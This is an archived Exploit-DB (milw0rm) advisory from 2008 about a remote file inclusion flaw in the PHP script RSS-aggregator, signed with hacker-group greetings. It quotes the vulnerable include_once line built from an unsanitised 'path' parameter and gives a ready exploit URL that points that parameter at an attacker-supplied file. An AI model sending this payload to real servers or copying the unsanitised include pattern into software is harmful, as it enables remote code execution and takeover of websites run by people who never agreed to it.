RSS-aggregator - 'path' Remote File Inclusion

EDB-ID:

5900




Platform:

PHP

Date:

2008-06-22


##############################################################
 RSS-aggregator (display) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker [ R-H TeaM ]
[~] HOME  : www.Real-Hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Script : RSS-aggregator
[~] Download Script : http://www.rss-aggregator.com/download.php
=========================== [ Viva IslaM ] ==========================
Error ( display.PHP ) :
include_once($path.'/admin/fonctions/config.php');

Exploit :
http://xxxx/[Path]/display.php?path=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE
Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..
All Member Real Hack And All My Friends ..
##############################################################
 Found By Ghost Hacker & My TeaM R-H
##############################################################

# milw0rm.com [2008-06-22]